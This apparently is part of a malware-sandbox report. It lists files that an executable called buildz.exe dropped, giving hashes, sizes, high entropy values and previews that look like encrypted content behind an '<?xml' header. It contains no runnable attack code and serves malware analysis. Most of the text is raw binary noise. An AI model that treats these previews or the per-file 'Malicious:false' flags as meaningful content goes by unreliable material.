                        SHA-256:DDF42BAFD1F27986F6F8AA494044BA834E4737735B01DD52C7E634EE5D134C56
                        SHA-512:260D827D80798907830644707BE9ABDCB5ACBA5743A74F7AB464352628E97CA2E8FEE1E706E1A0D4DECB94876578E495FD6938A736CCF8412DF966E3A4BE82FD
                        Malicious:false
                        Preview:<?xml4.._m[.....b!..uU.].K......+Q.3Q.T....R.......W...8.Q?#.!BP...N.|..3C.0WT}..^...#..3..9.1.1..Vg..........3.....bZ\..".7.)K...5.R..g1..|dNe....'..- .......8nv....J.T....8......A....g.}.".....Cc.q.....S......7....X...@.....pkG....I...){]..9|..x......6.ex. .J..&.....m..q..#.T.K.=~......8..Q.y.TV|S....}{.*..8L...3a,....>.S...e.7.Hq.8G.>..~0#...O..Pd...;...*Y...2d........'\.gT=A.......He{...55".*.IEXr..24..CfS...!....6.O..(p.v....&..2..H8....&aD.....j.aE. ..$.z.".R.F.K..%.........Wz..1S~..*CwG..w..I...8:.5.^..K...K<..0>...(.9Tg..]f.n.1.ziI.i$D*{<.KM..i......osr!..L&..t...........k#...e.B......;0..Gd.blkY....WWq....:._...wS.i.G...&...F.{i...s...k...g3q...}...<.z.....(v!.)..m!..e.......u...!j.u..6.P.V.n.....2!VO.:.pGS.c3.l...5.8Y.....]gi.q..c... $i9...#.. *.....u..AY...e=.\.MZG..V..;..F.\.p.T...././.d".B.!]I. .....a.@......^......A...R..I..8..IQ.<..J.|.X'Z....N..^0Gr.t..q.....xU..{.......XX.......=24X.Z..W..d..r..6]7...m .j6%}e..0.3/B...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1506
                        Entropy (8bit):7.863327054396096
                        Encrypted:false
                        SSDEEP:24:hTgkHy/K9aFxX8vOQDMR/3aMX5c195VMMGyC5zXKD7MkPMICoJnxQ5eGbD:VUKgxXgBD4qMXAXC5OPioJxGeUD
                        MD5:B9D83B296EEFC35C7C0C5E7DD3656D11
                        SHA1:5E90B4055EA70975AD44F1DA3FB7720DC49C7448
                        SHA-256:E9259957A162EA9F2BABB6F1636D1DB26E5F661A1C030DF1DCCC13C637C7A028
                        SHA-512:DAF7945A264417D1DD3BDFE8F3E23658DA7335418DD508D51E312503A7EEAB5E0C6DCAE1FA63415F45921A78B02B2E2A1FBF00101FC18AEB13BC01D986307ED9
                        Malicious:false
                        Preview:<?xml.k..N.|.j.........9..uw..U....~..L.u2`.Df..:...... ......B.".k.Q.......3...!.L..@.!..h..|D. .X....G.N....q.O..#.^}.D.60.]p......W,..._SG.8.....|....r...o.y9.I.:..K-...A*.H..[...3X(m..x..If..{.98zV.>.d".r.S..1.R....Hujh.4a..........E.4......VX.&`...T..:...=...6.~.5.b...Zk.2_.T.V......'.`...v.k.~.UM..*.(.JC.o.....y..J..q.r.W.(...C.s.(.`..70..q.p/.......=|.Y1.f5[...1.?q20..ij.`.B.H..F...Y)e.#[.3...`..v......C)..SL.....*V..N8.c.=........j......c.q.sY>.3i!.U..8...Yp....@|....&.|;.~....p.f...e.5).....0z..3..4r8.....I..5E-....&.Bi..Z.~p...3C.S.i..S...B..[..Yw..s.r.1.;QV.{. x..;Z.k.............:..8.HQTH-.,..Nc.5'=3..q'&zlv.}K..j.k.v.......6u=6......Q.Mm.......S........NR.ZI..s21a..&..%.U.P.....cJ(..j..&..\..+.....C0.J.....d....k.l).o.Go(H...('..5b...r5.f..o...:.g...n$.d.~....WW......m...Uh-.rK..7..%;@u..v.....q6..!o...&...fY[.z.....a..[...s.X.ZO..'_@..6;/1....Rt......)"...e.r^.Ev.....e......./..mpEy...('..(..,.8i.)...c)(..$%.a...03........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1511
                        Entropy (8bit):7.8592873486353785
                        Encrypted:false
                        SSDEEP:24:eaefAXbmdzL/eSKJUGv8MN47V4zaiFy6yx8wWng8SV9iHmlIkGbD:NEAXbuL0r747GRy6yxHWjsiSUD
                        MD5:A4AF86BF129834E27D8560EC3E52E0A9
                        SHA1:B5F9F0951CD97921DE99C951318303BA6B8FB696
                        SHA-256:44D5F4CA81253C517FEBFC077747BCED836664339E5F4A8007703E83F5C15E5C
                        SHA-512:9CC1CD89776CECA3EFCFAF9DE12DEE25A0F964DAAA6BBD11E8988CBEA7C6C9070822EBB5BED831844057921C2041BB5102BC3165AD96AA1BB06AAFF2E6E53D56
                        Malicious:false
                        Preview:<?xmlj.-l..n..4.5.........tU~...d0,..#t:.F.........}...*J6.\.7.@H.,....&n.............w<n-.NZ5XM+..^....$}iQ.CD+{..H....xb...[jn|.;..u...=.ON%...~.S.G0.6!...J.j8.%&.d^..*....8.-....6.K.........~0.*..[.8..w6.....'.}S.......A3.\i..\mU6.xA.s..c....t.$.....6-..JbGyX...j..DC..D........t..+....cl.=.U.(.. .4.mq....]#.K.i....nK..u..W..O.n*^).)...%.........a.np...X.h.A....b...xv..4.v%...@...T-.d.{../&2.L9....o..$.....Q.6.EZ.u....;.'.).8R].{:..?..u.y F....E..:....v-.N....l.......*....K.....r.h../..DF%.>.F........Y..P...4~...$.....j.E..K.#M.c..1./G....(.o...1E...J.....~..G...<........K...5.`.......g.......6.]\(`p......K.v......W..Z@..5}...c.d..q..../.........gK-H..-.$>.:.Lr/E..o....{.....@.E0q..%l.b..wc...f...n.1...I2.r|.............S.a......?......O....`...Q.3y.#.9f.=..r.{T.....^).......6.N'0zM.W..>^.gR.}c.B..X.Q...u.d.m.V.x.q.^.*..pS.........y~R...]*H!..jX..8.......\.}c.W.E......77.[...-.qy5#..0]..4'.........I...@.;....L.!..U....._CI...p
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):991
                        Entropy (8bit):7.795152552690384
                        Encrypted:false
                        SSDEEP:24:/bhkCH1TEQlbR36wKmHy3gbPAtkF1g1kURGbD:eCH14c6Jgg7YKSuUD
                        MD5:738EC1BAB29F61640C1BC982D88F6C37
                        SHA1:1401FF06735E580D22F24BF394A9093E1743F917
                        SHA-256:3947D4506F76E9DDF235C89C806E7CF9803043D7AF544C4A3762CFD7E53B48B5
                        SHA-512:557BAF451050ACC8EC6A416E9541264BE9DEDD9F7BD496F75E91ACAC347C626FC8422F7E733BAE5C7B59EE718F7187A51567F6176C2064F46815CFE79F5CCD98
                        Malicious:false
                        Preview:<?xmlPuc#.>...3.i .M...(....!.h.......@J2. ...pj.....H.;.F...S".T...(.`.WLk........h...z..0F....i..%.w&.;.J.....r..Kc)..+=..[1[8$~x.`....h.K..:.Cv..T...^J&...g...25(-.P.Y."~...N.T........%..{.d.^.........Y..g.G.....VK...r...uH.....1.r..J.ZU..;.'.q!..W......4..J. -ni........v.1.<5+.@.....|/........7L.V..n..L^VtE...J..yl0..x...*fe$..&..`..DT*."$_......HBX.:...U."..;........./..P.A....x.!.3GD\../O/.....}.kc..R.0h......=@.o.0[[.F..Gk.itJ%...M.{V..I.,A)Afn....(.H.dDyN...yAj.U..*...h8E.]`............Z..7l...,..U.W_..j..{...\z..%.dE..D.q.J..zz:..d8.du[...^c..n....1..Y&....s..&_zlZ~.0.%GYh.|_vo....,..78...K...c.HN'.....2.UjN....M.U.PLy...5$..B4q....Z@B.NDPXC.]@..rU.4..T....uc<...R........A:A/..o.x..x.c-x...m.....{.T.l.~.dJ......L....L........g.'j.~.b.z...|.7%9./.O.{m..N./B..b...J> .MC)...z....,.\..5l.....B.@.W.D.)...-1.B.Ej.>.fQ.l.j.X..27H......`.6.u.f.0..+..&..E.W...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4150
                        Entropy (8bit):7.955157318808873
                        Encrypted:false
                        SSDEEP:96:3a6PM7y5L/mPEERNRO95c2+jQxuIFbLEU6Ws0w5fUsj4A:3a6zN+smQwQ8SkUzwZUsj4A
                        MD5:BCBC758371F1438C3E046F1C2CAE43BB
                        SHA1:FFD27F7235CC625BDB78825D7E8611E6CDA387A4
                        SHA-256:70952251AB869960C8C7918EBA76003166441514600A7B0C78858AF9AB0F5E5D
                        SHA-512:51364FB41A49C51BAF5016447CF07ACD1D685EB28910302F0049A2AD15CDA96F0A44EE921D0574DBCBF92F332E0B0C6206300866D889CD03216045DB009A1F1A
                        Malicious:false
                        Preview:<?xml.5.`.Gn......~kA....ux....q.fg..o..#...#8KM..s..8)..2-.7..qC.A..&..tk..&..|..%...L.,..(g\...3..`.n..ei..2.u....)....-=.r.P.g]3".C.........T...H3".W.......8.xX.F...+'.t..M.......z...h=...c.....v~_{........I..;l.|.....Y$Z..[P@...!n...q..z.&..8.3C(7....y-.J .,........3I....E..Q=.(....Y0#...9jUd.P....h.A9"....6.W..AI5+..bX..T.%..M..s1..&Q{.q.b]D.*sb...F4.d./Y.f!.3.........@......6H*.........M......m.._..t.,5..%...K.@(Ou.F.P.......J)........=?T..@...R.....Q....j....?@$..H.+.....s......FA...r<k..z........n/...u.Ws...:J#...b....>.:......y@.}...3(..+(...5....h.2...|._ ?Kw.V..C?{...c.....1.W?..'.."......A..r/...|.a...Q.`.....A.F....I{.>9.k..I.....W5.....~9Y...%/.>..-}n.Q2."./.{.P.`K..T.....&....{.....O./.m..pgF...-.C&..w!*.......t".`...=.o..........G...v\.A......O........Y../Xn.T...R ;...%k...9T...a.....X..h.mf z.BU..L...!....Q.!.I.s.>.....$y.-.[.........Thc......6.N..f..'..;..P1..\._jKId....o..Z..t.<..V...m.rOy...7..>..f.,.u.Da(....~-.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2974
                        Entropy (8bit):7.932051131234011
                        Encrypted:false
                        SSDEEP:48:O2uXRg7obKlbNTGLOPpx1sOj6ajaKxN8j0BBkWT5Du9tlwLg6++zczYEw0VFR7bV:f+5bKRNKLOX1DeaOENm2BkW14wrzcz+e
                        MD5:B0481A9462B15AD9AEF8A9614BC8C0D9
                        SHA1:CC8F34A06282F9D3514BB533130DDD3751CCBA68
                        SHA-256:2DB71505522DE9EEAE5D2DC6C37023326D6CB4C907C29AFE3CBCAA617AC3D734
                        SHA-512:B51ED8C791BAD5E66B5EBD571AB338167DB32D07E4016CFFAFCFAFD970FED68147117D9B2975FF9E15D1F6AE43ED978B4EB6D5B655A975C3CA69E247F1C03A27
                        Malicious:false
                        Preview:<?xml......P..D.....b.D.@.f.F....v$]}....z.....P........C.....-...F.D>..R.g......r.1....!9....* sY@...../...,C.bW..')lI.x?k.T.L..H.Nx..D....3...=....XX....`.c.".....J.c|..wZl@..}o N+..Y9}..M..o..z.|.BT.....S.M...>9V|.Xz].AG....v.M...ty..+..d.......A...?.9a.^.1..Z..rg.\^..Y.15!.T..r.x.....}.....bI...W.[px.: ..D....pE...@_W.........,....t......6.....I..{....)d..`,.K.-...D..R.2.b.[..`.s(....9w.._s...7.<H..3.].f.X....7.$........ZB...5NU..G'.{..* .>^...)|...f..k...-W1.B~.{%...8..)].).[.q...l,....$h...Y.."$}R..bu..mi.........A.-R........zf*.......g.n[h....O..mdthZS1{R..B`w.j.V.f[..+,.x.:.]u!W...a}e..O.g/+.F..6dm.j6P......7.....C.......P..).......F..... ......^.V.Q.l...._i.6.w.N.Y&.j.../..UL.( K....=.+....ZF.{...)..xu....E&..E,.D...u...m:..;.7T.:.s..4..Z0...^.p{.|1G{v.l...3.....1.v.'.*.P.~.....B.w..`..G.\..WiG..i<+.Rj.-g.*d..d.....h.Q)!$.....x...>O...F0.q...g.....9.d."._.F........%.....w..a...g|KSo.@.......24X..h.....{h$I....e..C~.....Ud..C.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3363
                        Entropy (8bit):7.945739802469321
                        Encrypted:false
                        SSDEEP:48:s+rw66NK0kNcLttKTX4wZ1825zX31JjJjWkk+0Lt3H1Q1CiXYWWoXtdqqLUD:sX6V0dLXKPnzfFWkOHikPoXTqqLA
                        MD5:EF6D77F9E617D2FB0D9FDEA715D69825
                        SHA1:DB93B495CFB16A7E55CD8EFB05665FD556390A59
                        SHA-256:C2FD335692EF6AC633C7E5BC76C6F9354FC1B8D7747FE99334C60AC712C0632B
                        SHA-512:E77E16DC999DF52236CAD5C6C8AFBF6B2124B58CB9F900ADEBC8AB093B462817CBE2B75B9F41B95A2EA4BA56EEF93C2097A5E0C6C8AF39A3956D37C5F20CF369
                        Malicious:false
                        Preview:<?xml............Y...H..b..."n./.y.9)...S7..6.|........}'.x.W".2R....NV....G.^..G....6i}.....$..V.O..\.$P..W ...X*F...ql.Aj..5.v...R.(....r..f......P+."..L|...m.v.`#...t..9.....s.:)M.4+3.w2....1g.]z......9Z..3..Aq.~<.Q.3...q..B.mk....*...:.1..a.E.=F./.....X.O..R...w<..iz.$.......^.<..}.8P~.u..7J..Gj..?......I.......0[.-u.P.h...:B/.......Ev.Y+_A........6>.#...Q.5...d_'+..J9.N.C.D3..9.z3hI.uB......MZ.........T....z........A.)P.$ ........K:.iRAi1.S=..........^.S....\..Q=.!7`..G.?..w....5.x.*".....E..].#..m...$C.">./... D@D3.C*5'."..@.O.X... .z..~[!.}.&..S...dy@\:.*..4..P....1a..f.5h.UKF.C..._%2qV.?.Cs..V5.J",.......ug.:..=.....r..y....&E.....]H^...0.;...7...#.*.w...9......B?.q<.....DO..}t..k9.v....mHY.nsy....d%._..z..G71...^.`.P..9..^0...}%p8.yj... q.{I.].*h........g..;..[..j.!.h.....)..N\..e....)..[.we.0eG..?7a7..p.R.Vj......<...je..Y]{B!.......r.V4..e....."S..Mf.(...`.Z.,X."c.y11%....&..?E.{..R,.A;.:...4.`..wR.n..L.P....M[.... .i.....N%.n...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1295
                        Entropy (8bit):7.851971676010132
                        Encrypted:false
                        SSDEEP:24:BlkqrqgJlyx3LNhOOGsZFXgETvb4DY4maef2AQjw60v+xNCxfHne7aGbD:BlkqrlyxLNhQsZFXgEbb4W2AQjl8+D+A
                        MD5:5773875FCEAE8EC9ED4E5D8CE0773BCE
                        SHA1:A7F56F98172DC3FDADB9CF1A0AAA23591D1DAE94
                        SHA-256:3567E928EA1938904AAC5AAB87B0A1322384FFE1FCDD7A79A23FE1626CC93EBC
                        SHA-512:800765D4CF833F1F1601AA20EC8A4A4AA673D329E58E61185B767351AF5F4436E8C339260146DC1E4F708EAC40E0B5C41630B93CBCB701E0C4796711C9B7E958
                        Malicious:false
                        Preview:<?xml.....P..h.....I.Lbp....9Z[V...Jd.m...7q..J.R.....@.7F'O..QF..|.n.q..E../ci[z..M..E..,..J...........OB`Cp...T..hs?HF..Q...t....o.D~..ES.......~.......3Q..(._g...Wi7...i..#v.n..S..*.7..#.B/.U$..F-...z.o..FN.*..+(.,g.>....6R...B...<.....h.fRV>..{$..,.......h.+$..UQ.....A.Tv.....n......|.D.i....g,...n...b..'4.....j....ci...kK..uTX.i8_.+..K.2.....gt/8Ytd2....glZ.H`...y..T~4.^...3.7...#....m.8A.*z..?.<..l.A...G...!l...>1&w.7........KIf.......AKs."......N....lMI#~..\...TK. .JzWj....s.|...C..:.(.V......O......&.b"SU..n.&.....c.e...5....jS(0.I.u0...@.z....R..f>...~!I...w....]......SI.........y.\(...W...lEh.!Fu.A.}..c.....1....od0...|]6n.X.J...7.l4i-...B{.So;.3....^.+..+..\......\.!.$.S..!....)R...'.Rg_g.......rA..E....@.w..w ..{.w.....3z.7....)=..`....'.d.. ...rju..P..pS.=;..M.......k.cY.U.&.S.F.b\......27.(...+M..=..Q.j.Gwe2.M..&=.....0..N..?*.....G....2.D...q.._.:....cx.A" ..kd.-c..B.....a......?.i.f..Q.h.....X>e^...T..<h.C...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2582
                        Entropy (8bit):7.929515409949001
                        Encrypted:false
                        SSDEEP:48:+bfu0GjnEBfY5KSFP6C/R0nydKAKFSMOrlzK9oR1JX48oMzQZvoABK/hl/ZUD:+b20GjEu4SdxZdNoO+9UvX48cBoABYZA
                        MD5:75EA6524D69EA434802D4D8A66AC3935
                        SHA1:07A79AB8F2F0D99D84506CCACDB221CB605CCCD2
                        SHA-256:C0839015A1637745605E47E9FE1A1E132112905A5119181D7F5660E82ABD1376
                        SHA-512:3E238C5EA5008CEE8CD2CF8DEE703DE7571F7A257C263C61C0BD5B96DF71C69069C66777923EBAA407C125A50ED1321314F7D9CAD33F51937FC346D82D65096B
                        Malicious:false
                        Preview:<?xml._.b.E....:g.C.........d..,..9=..8}....$..u.:7.....H;..9......".V.M.m.....G............@.>..Yz..D...K,.6.R.,r6....;Z...w..0.Y{.'...n....1WuZ..%(..O....u;C.a.af..T.Rt:ITQ.0.;..G..mgf..0P@X...|.k.`Y..[..c T9...;..b.%I.I.......8.....*.....!}h....4[v..@....K..1..o.L...mk\a.p....\.....g.U.....\s.H...I9..+I..Qsc.X.I...}.6..'[.+g.U).(=...`......kI...........7.7..v...........h*f....55...}....2...O...T1......[.!$s...Q..j..z$U~.E.$d...{;..0..p..h.#..DZ...........d....:=.A[..Z....]...gi.....k.8j....+.)8.&.W..D|.4i..&......m."F...G..G..B..H._...)~.l^.,|..ad@..\a...X....\G....M....Ai......D.=.Vi.z.=..|..++..{2...a...\.@....3.4....o.c...@Y.`.W.|Y#[.....l...k.;.!D....46}.x.>.;..&L.,n...,..Fh.......q.......j&2....).i...[.|,.RCnQ.*.\.!...t.u.\.v.5..#....RF.9@...4....$O...H<.>........&....Q.'o/},q....\..K>..f..."z2%.`...S..$Ob....V.....G...... ._.{...?.....J..g.T^*}..T2E%.|......Pq.T...e...P..(...o*...1b..%...g/.uL......"..../...*.;.........6D.Ibi0K....}{J..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1787
                        Entropy (8bit):7.899299163632239
                        Encrypted:false
                        SSDEEP:48:Dw1dr+MJU/vM0zAb9X/oWaW/i75DaAcHUD:DwD5UhyXgWdadDaDHA
                        MD5:44E623EDAB88E1D2427231E9AFD7DC12
                        SHA1:C907B1710D40A9C260AABEE9783E265963A9930E
                        SHA-256:9EF4933E59BA6604DE78160C1FDEE6B9559A7C197124817C93A21BB61107A426
                        SHA-512:84330D64C2B2800ED188B9CF6FB9A9CE3BE3E2178CF4A3C8F43FD638E42374E90DF2D2B20DEB02F55A996976FBC2FBFE52CE4099DAA33169F2E5FC1509DC2046
                        Malicious:false
                        Preview:<?xml...<.]....FC..6..A,.c/\.5l#..f_KR....)...O....6...P...F..?..9.;._.T../w7.Mj..X.u.\...^. .J.\...W........5..?...R...).OD}..'..K.ZiH.{...E..d...Q........R.e..y3....F*..m._.D.|....a.n.*\.T.`..L(...o9.+.N.....4..9. U.$...c.*.hX.C............+v4$X.R^....7. GX...s.@t........@/....J..|F..W../.S.ak., `...f.._Am..:...?.....oTi`(0.}..........B...\.k......Y?.D....._.L.q...mO......D2.(0..B......$j.5.ZUG.._.H.....yzXz%....*G..B.h...gn........k..EM...I.@...~|!-..ts+......p..F..z..2.P........Hw.......|........l2.m...h1[|.C.3.h.b.p.u..1W....B.!......s..0.".c.hI..9......o..M<.w..T.9.+..~d....8(.%.y...+..e.O..@..U..!A..P.g.SY.<)..W.J.J..F^..."Ne.#kM.hN.f...[H.(..q..`....2TA....ps....*.W.-..'E..S..y....D..$p......5.H.c...........<.j.5..-..|....7].C......7.{.....c..q...x.g.?.F..F.ZI+.. .f..z$.V.l1..S.'A..!..[..L.....B......(@EhIi..qp..F~m.H..A....EG..K ....i.......iW.ueju..._..q.o2.O...ev.p.pc..*.^..T.X....U9D......to.........|...E.G....H.....Z6...3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1583
                        Entropy (8bit):7.884282369389147
                        Encrypted:false
                        SSDEEP:24:dD7SVz8GI7m18qO3WqKUp11lnb3CYlAOb6u0L7esjy1S2xReyjjLiuGbD:Jgz8GI7m1KvKSVWu0L6j4U3iuUD
                        MD5:5097734683E744028F650E6B380C4852
                        SHA1:3D9F2192249836B2A8CF1159C2C8156438326A8D
                        SHA-256:588564DED1A445A1525D5E6B927CA17692FBB5976CF6F4F803907653EAFBDBBD
                        SHA-512:76EE920E23A4630584E407B59CB2FD75D591C0B9CA6C8E2B36E9EE372D1102C7B81A53154E44AB0B97862D9BB663C5D93DAE9A9C2E37B2B2D0DF3CB050AFECE8
                        Malicious:false
                        Preview:<?xml.(J}~...on.p_W....+...n.?....J.......... ...F...^.:.jh..@..g....6....?H....e.<U.......0...9...I.j];T^JR.S....IM.{~.3..[...#...g..0/.:.i..[.!.N~G[N..%Yd.Z..k....zq..Ifs.ya..n.V4.m.).H.....~.b....7..1......t.y...x..}=.lM+..m....)..:.T.o5.....Ox.;.).0.-*1.............i..v..p5hv&^....{.4.`...a.A......RqN.A!8..o...w.....V."...Tz.G.zj.?@3....J_.......[....`'..aA..U._.(i..:..?B..k..m.D.Jx.`....(..>1......X.$..C..".].A... f..=..J.O.....cx]..6~.....S...VAA.DEn.x.!eW....a..RK.k6.3.GA{..i.C....P..P.(.s..\.C.}...dJ..G.wo..f.=..)..Zs.[.*..A[!..m.O$..f...T.'....B....2} r...;F...x..H.K........dm.(Y.b.J.`...d..4.F..P.j:..i..l...=.0<.M..'.z.\.h.8$....F...FR..WX...~.=.....x+..Ml..n..p...r....i..$:Ux.8..!..KN..q.t..z....E.@...U...3r..r.$..{.3x.l~...[.Z...M.n.?..GY...U.i.b~+P.O.)..[.k.$.A;....... X........._.j-..m!.b.......u.6.9../.L....S*!.u....h....n)RjQH5.....h.|....`..tHA..eR\-C0..4.$.(..C..aB....I.._....4h....d..Y@.G/{C.....1_sNa.Zl
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2801
                        Entropy (8bit):7.926524872544491
                        Encrypted:false
                        SSDEEP:48:+JTv9HDWqdXBuyD2E57ScBMmmNmxb/W32TPGtqUeIpM9EOfqUD:+JTFHCOBurE5ScBONmxGctIpM9E7A
                        MD5:AB297EF08A1FA89762DB3069D6A71AD4
                        SHA1:3E5A118336A709CEDB8E5CA5A5E6BC879B0C8FAB
                        SHA-256:3A8C682F3E5ED3A3EDB5BA6C54621120F2566D7606FCB58FD9C6DE41854B85B7
                        SHA-512:5AFFB0412EFD99307ACD07458EC2DB7ED5C8EAC0F6103362E35CAC7FAD248A9EA4077BCD5E210837C5CF2195180BE673F59838E6A4639EA28929B0F90E6042F6
                        Malicious:false
                        Preview:<?xmlV.)......mck...(.<q..O.k.._U..[..4nF....iPT..`...FP..h.N.Y..w[.8'....z.f....=....4...`.:...#...;.l.Qgc..??LPG.l.>.V...E.n..x.iP.o..O.YJ.Ma..3M.W.v^.7..0....Kq.@...\...v.*X.{.|....Y..@..d... Rzc.<..G.l,h...R....#..D...#.6q....F.^..,.....?..TcAA...6....BT......b...k.vc/........2.2..l|..k...!....G..rmB...?.9.P........I.{d.l....[M.K...ar.|.Z...V....%-.FVY....]}j..D.+.<....W4@...f.......'....XDn..x...........tC..9...)...s.8Z.....+x#..V.W^;...@u0..|8x .....LC...l1&.&.....N...Q..|...e....W.......[s......9.?.....sl.+G...A......+.^/`y.....*...-........ ..'...?[y..Ld.2..4\..I.......Q/..(K}.Y.l.c.-.~....j...26v.{z.J...AT&^...D...'.1S..9...n..t..U.I.NX.4...g.....M.q.*F..M ...........N...V..]..O.p..>.+..R.<;...\ .Y........Cg+).4y.M...h=...{v..X".iR.../..A.c.....>...H..w+........j._.>.)L........a.\..Q9..'.4p......."f....I{..g_.....d(.E..e.._...HFN...\.b..oG('v!.......!.LT...y^.^/...<.h.S..3.*M...X..v...-.x....u.!+.."jI....c.Q.@.c$=..c2.Y..].m.3.......b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4121
                        Entropy (8bit):7.961269060682633
                        Encrypted:false
                        SSDEEP:96:WbXVv9SPapHlWmf+sPp5Hk2TeLNXDgX72RiJvy93muoA:6XNcPQlRf+sHHk2iZ0KOvypmuoA
                        MD5:B5EA9247DAAFC18524C0BCDFE5538680
                        SHA1:08A987238AAF62683CF832E7A263428FD87B4AC4
                        SHA-256:B89B701B7264A331772FFE38A33B543FB7A14959738B797229D7CB349FB9A94D
                        SHA-512:C349EC2C5BAD50570A2B49BC21513EFA5E4C9C0BD5331379CD86586AB11D68C6B462BB310E5197FCA36D0485858213CCC3064EA734A09A38734425C3990DA5AD
                        Malicious:false
                        Preview:<?xml.....+....y+.g.v.....p.*h).'.Ta3c....!z1..9...'*......L....I...X.R........Pbl.. .Cs.....WA8....C...q.Q..J'.8`O..WB*.9....)mlIo.....yo{./.ZT..ij..n.%.....Gs*..w..g...9qK.RId....H.....d.R.P4|.....AV{.H..C..}.:.\..Acy.Hs....1.....k.s..g...~aUr.vhP.......u....1.lH*:.w..Ca....Nd."...Q..4P...d?er..J..P.=...<..z...S....M]......n..0h.^#7....o....n._..T...g}.F.C........*%...P.x.'..C..B...5.B.3{.v.gV...f....CQ.k(..).|e...]....x..V.&..?g...5..}16.$.<...v..\.` .C..._...O....K$y.A.<......2...W...Y\b".1j...(.........<.f....3..P$rf~.]..&.~.P.P..dgw.m.bc6{3.G..g.S.. .%.2$.../W.d^......e...&.0.5f.}.c|T.92......L.4G.U....K.#`.......;`L]..\.C.p.B!.......x.R\.=.U..V']k. Pw........Y.;!r(%hRyA.-..`..P...$Fq..I$..z.....ta.......e7..=._[.G..b)wA.!.G..7..F.../z1f.....T.j.4....G..q.W..]..}zjx..3....]......x.....ZI.=|..|.Md....%SQ,..;....../.ETQ#j.l..3...2\..Qv..X.s.</.....NXL.b...b.D.C>...`.x...g..j....Z6..K.+K.Q.2...........(..5(..<.R.'q....aI\....<.#.*...MZ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8140
                        Entropy (8bit):7.9779548908747815
                        Encrypted:false
                        SSDEEP:192:4stYcSquID1P/E/ZUqxZKMkY3ZUHf+WEzcA:4sdnFCZUaxB3ZUHWWOcA
                        MD5:9EB4E1CB1E72097A3F81A55EF999C0CC
                        SHA1:F5B6A5CF5CCC24E9FB58E2D5CBE76D3A3E026FD4
                        SHA-256:D80D2949EADCE218D4F7A7F523C7369C26612A7A5E6C541AB068A37445FDD072
                        SHA-512:6AB8E2067C8595D325905FA174A053C43445C750EE9BEDB72E04F8F3A3C7FBD8C5E7B02A7AA70D340C76EB151527D7536242CE3BAE41852DFDB86BB416AE36A5
                        Malicious:false
                        Preview:<?xml..rc...f&l...*..U.h.I...H.. Tz=D........fL**.~-........Q...$...;q.....:.&..M.-J.z..T.f%....g%.}W6...0Sb.}.l..n3.....7 ..y...s...\X..E..U<....[\..p....[...;9_.......R;.l.B#.. .....S.g+.....G........>...F}.&.3...kc..Y.>G....".$at...oHd...Y.0Z...q.....o@-@xF.A~n........n...04.....)....3....C/....H..C.....>b..p..t{.H..E.W....)=...... ...F....H.z.r7g.fQK.~.F3|.......d..uW&..(*...z.N7.....B....$(...1..........X.HE.^...R.j.....t...:r.@......c....[.+.ow,((C9.m.I.^7.Ue.+..N*u..{...E.P..@........Y....B.....8.].....3.i..D(w.f.z..mg..,k...4}..9..(....jI$.4...".to*.U.y..YFbS.TR(.._....R.8.Q...|..E.$E......e...E.#.S.(.p....k...'....O.i..;~(ha...CD.T....a.&.*.}#(,B@.&o|.^1.9..{-..V...f...(_.x..S.nuM..S.8.$.bq.q....k..G..[h.h...B..m.3K...e......}$..{3..&...+J..b..H.k..y+.c|...)2.e>...HM.y....>.(1...."...e.>..q.G.b.}..S.d.V...Y.d.x...].f..I...S....x...L]..r..]..O[ U.Bs....#K.)...\r..m.|..{V.}@..f...'...)......j_.J3..G.....}.A...L..nd.g$..C...T.2.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3313
                        Entropy (8bit):7.944503789157546
                        Encrypted:false
                        SSDEEP:96:lfXnIB9Ahtr89ryhw1Zvz9jViAmSNnRDqfA:lfxw9+e1Zvzy4DqfA
                        MD5:8AF429FFA0A2DDD8CD4A07C970DEB26D
                        SHA1:014E1D3D6C8B52053BE72F8670730D341BD9470A
                        SHA-256:6CF2C43BBCE698CB773D91280B7C051FC7F11F7A05F5C06FA2A935B2AEE176FD
                        SHA-512:5B1A963BEB5C017E8AE3F4B5A67669E4A971CD4125B218D2703808BBE1BCF4039A98E055E4F6DC1F4D6FD8B13633480A191CE2F7ED208AFED851CF3DAD3F37D2
                        Malicious:false
